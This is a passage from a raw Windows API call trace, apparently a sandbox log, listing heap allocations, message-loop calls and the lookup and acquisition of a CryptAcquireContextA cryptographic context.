(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.769] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0125.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0125.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0125.770] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0125.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0125.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0125.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0125.771] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0125.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0125.771] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0125.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0125.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0125.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0125.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0125.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0125.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0125.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0125.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0125.774] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0125.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0125.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0125.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0125.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.775] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0125.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0125.775] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50818 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.446] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0128.447] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0128.447] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0128.447] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0128.447] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0128.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0128.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0128.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0128.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0128.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.447] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b18 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 